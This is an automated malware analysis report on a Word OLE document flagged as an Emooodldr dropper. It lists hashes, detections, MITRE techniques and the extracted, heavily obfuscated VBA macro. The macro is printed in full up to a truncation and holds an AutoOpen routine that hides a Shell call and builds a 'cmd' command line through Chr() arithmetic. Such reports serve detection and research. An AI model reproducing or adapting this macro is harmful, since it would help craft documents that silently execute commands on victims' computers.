Emooodldr Office (OLE) malware analysis — malicious · 3f3587b5179bb464

MALICIOUS

Office (OLE)

78.4 KB Created: 2018-09-14 10:01:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 63642ca5cf2490ceb168e45183d0040f SHA-1: 4689425ce4ea10fbe20cc28ef65ff2b4aaa3117e SHA-256: 3f3587b5179bb464c8f0d382c9ba39dde5a59e0562c12e0ba37b9975ab1a873a

142 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Emooodldr-6683740-0', indicating it's a dropper for the Emooodldr family. The presence of a legacy WordBasic AutoOpen macro (OLE_LEGACY_WORDBASIC_AUTOEXEC, OLE_VBA_AUTOOPEN) strongly suggests the macro is designed to execute automatically upon opening the document. This macro likely downloads and executes a second-stage payload, a common characteristic of droppers.

Heuristics 5

ClamAV: Doc.Dropper.Emooodldr-6683740-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Emooodldr-6683740-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7908 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7908 bytes
SHA-256: `52c23b6ce14b9ae9c1abee11e57d6fae9bb1d19e38eff3fd2c76d83809240236`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wUfpDMVhqG" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Dim wRumSE() ReDim wRumSE(4) wRumSE(0) = (16541 / zXhIk) wRumSE(1) = 8417 * IQEJj / LIswc * YjfdA * (12560 / KzOJz * AqXCQX * 38615) wRumSE(2) = XjQwm * 89192 * 43322 * 71309 * Bppnj / RujCTt wRumSE(3) = 42747 / GGffXn * 11182 / ZIMAAP * (58885 / MuZpM / HqQDF * kVALB) * 73627 * rGOwz / ZQhbj / CPRpZU Dim mzpPUh() ReDim mzpPUh(3) mzpPUh(0) = 95288 / EHAzNF / 75222 / zvbmm * (ZPhQD / SfarVE) mzpPUh(1) = (44963 * RwiPGi / 23651 * 49543 * jYzcJs / suvjaZ / 66359 * iEZYh) mzpPUh(2) = iJivr * RMjErz / zrGQIn / 92397 / (bJoRrQ * lBJns) Dim PPhSt() ReDim PPhSt(5) PPhSt(0) = (25067 / Nqsall) / (YoQll * CAtdz * 66683 * aivDHV * 83966 * rjqtjS / 25467 * wrFfM) PPhSt(1) = MsBGI * 5194 / 29647 / DSKVF / 67197 * oSPtlj / 10902 / rCqph PPhSt(2) = 95707 * uDiNSC * 3385 / NoMWf * 46133 * NNiXHY / 80734 / bjGTJE * 33944 / 24911 / XRYHqs * tmRCE PPhSt(3) = (KaBIo / LKqNER * jLjrw * ciwNzc / (UNdUH * hCVjRB / 29570 / BXhETp / LEKvVG * uMMCjR * zjVFQ / AKiRqh)) PPhSt(4) = (aGRJf / jJITZl / 63623 / 8774 * (16667 / TPVzi / 7375 / LwDEnA)) Dim uRwGOl() ReDim uRwGOl(3) uRwGOl(0) = (23255 / JAKcFD * (82663 * dbsBi)) uRwGOl(1) = (62728 / haTiV * khMjs * 7681 / (hjlQl / 47806)) uRwGOl(2) = (qzwmt / kFhwkO * (wPjuG * fZSzsM)) Dim cwqcQJ() ReDim cwqcQJ(3) cwqcQJ(0) = 52757 / iihkWj * zPzdpQ / ArJut * 61279 / BEZuW / IrUUE / 74230 cwqcQJ(1) = 42026 * CMVTwu / hsiJL / 20044 / zSVPvE * 63780 / HqAYW * vfZDu / wioavl * TLqlK / (95489 / rBwor * zcEfT / XKmNJ) cwqcQJ(2) = (11360 * ZzViu * 38915 / ANNRF / 80885 / 52436 * QujkM * lVZIHW) Dim dWmuJ() ReDim dWmuJ(4) dWmuJ(0) = (87139 / zHlqj) dWmuJ(1) = LAITk / tNXzZX * RcmIro * SuZNU / 62292 / 81180 * WXmwMl / 98566 * jmBpcn * ZMWKb * 84642 * wuBXp dWmuJ(2) = 32510 * uzEvKq / 99234 * bKNSr * 4356 / pwjin dWmuJ(3) = 99469 / zVOrJ / (47702 * wpviJp) Dim nwCnu() ReDim nwCnu(2) nwCnu(0) = (6634 * tiAoN) nwCnu(1) = (TjjrBL * VjdWP / (KciwI * 66954 / (UwiCVO / sbOiO * 57174 / iTXvz / (28743 / 80740 * EVfXos * KmsGmb)))) Shell@ rwahXZ + zjftYOWXDUjR + naczNushZ, Format(0) Dim AErbw() ReDim AErbw(4) AErbw(0) = (vPbduO * dfIpbk * 98047 * 38894 * (wIvJm / shXkZN * kinfaK / HXATz / (mrYflp * bGjjoC * 1226 / tGJob))) AErbw(1) = 74593 / iBvKoQ * 32719 * HbJMHA / rzkRO / vHqXJj * 26482 * qiYnr / WkaAf / fcEfq / WkOKEK / RjuEm AErbw(2) = (kDKQwl / PnnHY / 68348 / DwSCLh * 31393 * dCjaN / 29422 / ibfoVu) AErbw(3) = VLItR / jzGmVY * 39195 * QstFP / (50891 * HkWYJ * ILckOq / dHuSPn * (51088 * vuFpuH)) Dim nbwWmz() ReDim nbwWmz(5) nbwWmz(0) = (FjPkaw / wtWcP / MzGlii * AzpQH) nbwWmz(1) = 72408 * kmaBQ * (kLFzD / jvQAV / KOboV * nHYvG) nbwWmz(2) = zdoqSJ * 37301 * 41950 / suBtH * (66341 / wdjzTM / XivRPN * wpENz) nbwWmz(3) = (49193 * qcGhz * 84717 / TZvNc * (10642 * vLGXm * 62281 / LWsDI)) nbwWmz(4) = uFwfI / WIAcS * UfDEA * nHzCd / 96245 / MtuiGO * 56488 * oWOdPF / jBuio / SANGV End Sub Attribute VB_Name = "liGUhNalVHna" Function rwahXZ() On _ Error _ Resume _ Next Dim LmzQzi() ReDim LmzQzi(5) LmzQzi(0) = 64010 / NDdvQq * 67552 / jYBdNH LmzQzi(1) = pEwla * iuilX / 18683 / lwbEcm / (ZCHXbX / 95921 / JoKXE * JLAsHO) LmzQzi(2) = (JwJshn * 26837 / zwBbNk / zZKCOV) * (70246 / bzFTbk) LmzQzi(3) = 50990 / VYLQE / fukjYM * IwrsWO * 52536 * EAMYIi / cTmAWl / DBTjAu / 31041 * izYzS / NaFWz / QXzrvO / (SRzXpG / 54603 / 86490 * ZnNhSn) LmzQzi(4) = OAJPo / 27502 * 86367 / iXHQfB * 52996 * lHwAja * sqKXBR * SLcCl / mwzDYQ * RwMNoz Dim zfziGq() ReDim zfziGq(2) zfziGq(0) = 8104 * tAVvI / (kGQYw * IdXMiY / 63366 * fZbMaZ / 40773 / hhOjh * zVZMRj * zjnbOn) zfziGq(1) = 41896 / kDhJU / 54346 * ZJVik * 24314 / 47103 * (JNHdfC * SHzpip) dZnYZhq = Format(Chr(6 + 4 + 13 + 15 + 61)) + "md /V:ON/" + Fo ... (truncated)

SHA-256: 52c23b6ce14b9ae9c1abee11e57d6fae9bb1d19e38eff3fd2c76d83809240236

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wUfpDMVhqG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Dim wRumSE()
ReDim wRumSE(4)
wRumSE(0) = (16541 / zXhIk)
wRumSE(1) = 8417 * IQEJj / LIswc * YjfdA * (12560 / KzOJz * AqXCQX * 38615)
wRumSE(2) = XjQwm * 89192 * 43322 * 71309 * Bppnj / RujCTt
wRumSE(3) = 42747 / GGffXn * 11182 / ZIMAAP * (58885 / MuZpM / HqQDF * kVALB) * 73627 * rGOwz / ZQhbj / CPRpZU

   Dim mzpPUh()
ReDim mzpPUh(3)
mzpPUh(0) = 95288 / EHAzNF / 75222 / zvbmm * (ZPhQD / SfarVE)
mzpPUh(1) = (44963 * RwiPGi / 23651 * 49543 * jYzcJs / suvjaZ / 66359 * iEZYh)
mzpPUh(2) = iJivr * RMjErz / zrGQIn / 92397 / (bJoRrQ * lBJns)

   Dim PPhSt()
ReDim PPhSt(5)
PPhSt(0) = (25067 / Nqsall) / (YoQll * CAtdz * 66683 * aivDHV * 83966 * rjqtjS / 25467 * wrFfM)
PPhSt(1) = MsBGI * 5194 / 29647 / DSKVF / 67197 * oSPtlj / 10902 / rCqph
PPhSt(2) = 95707 * uDiNSC * 3385 / NoMWf * 46133 * NNiXHY / 80734 / bjGTJE * 33944 / 24911 / XRYHqs * tmRCE
PPhSt(3) = (KaBIo / LKqNER * jLjrw * ciwNzc / (UNdUH * hCVjRB / 29570 / BXhETp / LEKvVG * uMMCjR * zjVFQ / AKiRqh))
PPhSt(4) = (aGRJf / jJITZl / 63623 / 8774 * (16667 / TPVzi / 7375 / LwDEnA))

   Dim uRwGOl()
ReDim uRwGOl(3)
uRwGOl(0) = (23255 / JAKcFD * (82663 * dbsBi))
uRwGOl(1) = (62728 / haTiV * khMjs * 7681 / (hjlQl / 47806))
uRwGOl(2) = (qzwmt / kFhwkO * (wPjuG * fZSzsM))

   Dim cwqcQJ()
ReDim cwqcQJ(3)
cwqcQJ(0) = 52757 / iihkWj * zPzdpQ / ArJut * 61279 / BEZuW / IrUUE / 74230
cwqcQJ(1) = 42026 * CMVTwu / hsiJL / 20044 / zSVPvE * 63780 / HqAYW * vfZDu / wioavl * TLqlK / (95489 / rBwor * zcEfT / XKmNJ)
cwqcQJ(2) = (11360 * ZzViu * 38915 / ANNRF / 80885 / 52436 * QujkM * lVZIHW)

   Dim dWmuJ()
ReDim dWmuJ(4)
dWmuJ(0) = (87139 / zHlqj)
dWmuJ(1) = LAITk / tNXzZX * RcmIro * SuZNU / 62292 / 81180 * WXmwMl / 98566 * jmBpcn * ZMWKb * 84642 * wuBXp
dWmuJ(2) = 32510 * uzEvKq / 99234 * bKNSr * 4356 / pwjin
dWmuJ(3) = 99469 / zVOrJ / (47702 * wpviJp)

   Dim nwCnu()
ReDim nwCnu(2)
nwCnu(0) = (6634 * tiAoN)
nwCnu(1) = (TjjrBL * VjdWP / (KciwI * 66954 / (UwiCVO / sbOiO * 57174 / iTXvz / (28743 / 80740 * EVfXos * KmsGmb))))

Shell@ rwahXZ + zjftYOWXDUjR + naczNushZ, Format(0)
   Dim AErbw()
ReDim AErbw(4)
AErbw(0) = (vPbduO * dfIpbk * 98047 * 38894 * (wIvJm / shXkZN * kinfaK / HXATz / (mrYflp * bGjjoC * 1226 / tGJob)))
AErbw(1) = 74593 / iBvKoQ * 32719 * HbJMHA / rzkRO / vHqXJj * 26482 * qiYnr / WkaAf / fcEfq / WkOKEK / RjuEm
AErbw(2) = (kDKQwl / PnnHY / 68348 / DwSCLh * 31393 * dCjaN / 29422 / ibfoVu)
AErbw(3) = VLItR / jzGmVY * 39195 * QstFP / (50891 * HkWYJ * ILckOq / dHuSPn * (51088 * vuFpuH))

   Dim nbwWmz()
ReDim nbwWmz(5)
nbwWmz(0) = (FjPkaw / wtWcP / MzGlii * AzpQH)
nbwWmz(1) = 72408 * kmaBQ * (kLFzD / jvQAV / KOboV * nHYvG)
nbwWmz(2) = zdoqSJ * 37301 * 41950 / suBtH * (66341 / wdjzTM / XivRPN * wpENz)
nbwWmz(3) = (49193 * qcGhz * 84717 / TZvNc * (10642 * vLGXm * 62281 / LWsDI))
nbwWmz(4) = uFwfI / WIAcS * UfDEA * nHzCd / 96245 / MtuiGO * 56488 * oWOdPF / jBuio / SANGV

End Sub



Attribute VB_Name = "liGUhNalVHna"
Function rwahXZ()

On _
Error _
Resume _
Next
Dim LmzQzi()
ReDim LmzQzi(5)
LmzQzi(0) = 64010 / NDdvQq * 67552 / jYBdNH
LmzQzi(1) = pEwla * iuilX / 18683 / lwbEcm / (ZCHXbX / 95921 / JoKXE * JLAsHO)
LmzQzi(2) = (JwJshn * 26837 / zwBbNk / zZKCOV) * (70246 / bzFTbk)
LmzQzi(3) = 50990 / VYLQE / fukjYM * IwrsWO * 52536 * EAMYIi / cTmAWl / DBTjAu / 31041 * izYzS / NaFWz / QXzrvO / (SRzXpG / 54603 / 86490 * ZnNhSn)
LmzQzi(4) = OAJPo / 27502 * 86367 / iXHQfB * 52996 * lHwAja * sqKXBR * SLcCl / mwzDYQ * RwMNoz

   Dim zfziGq()
ReDim zfziGq(2)
zfziGq(0) = 8104 * tAVvI / (kGQYw * IdXMiY / 63366 * fZbMaZ / 40773 / hhOjh * zVZMRj * zjnbOn)
zfziGq(1) = 41896 / kDhJU / 54346 * ZJVik * 24314 / 47103 * (JNHdfC * SHzpip)

dZnYZhq = Format(Chr(6 + 4 + 13 + 15 + 61)) + "md /V:ON/" + Fo
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.